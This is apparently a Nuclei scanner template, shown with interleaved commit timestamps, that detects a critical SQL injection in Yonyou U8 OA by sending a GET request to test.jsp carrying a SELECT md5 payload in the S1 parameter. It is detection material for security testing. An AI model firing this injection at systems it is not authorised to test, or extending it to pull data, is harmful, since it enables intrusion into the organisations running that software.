2022-05-15 00:25:05 +00:00
id : yonyou-u8-oa-sqli
2022-04-08 08:13:23 +00:00
info :
2022-09-29 13:38:41 +00:00
name : Yonyou U8 - SQL Injection
2022-04-08 08:13:23 +00:00
author : ritikchaddha
2022-09-29 13:38:41 +00:00
severity : critical
description : Yonyou U8 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
2022-09-29 13:38:41 +00:00
- https://www.tencentcloud.com/document/product/627/38435
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-05-15 00:25:05 +00:00
tags : yonyou,oa,sqli
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-04-08 08:13:23 +00:00
2022-06-30 03:02:02 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2022-04-08 08:13:23 +00:00
- method : GET
path :
2022-06-30 03:02:02 +00:00
- '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'
2022-04-08 08:13:23 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-04-09 19:10:02 +00:00
words :
2022-06-30 03:02:02 +00:00
- '{{md5({{num}})}}'
2022-04-08 08:13:23 +00:00
- type : status
status :
- 200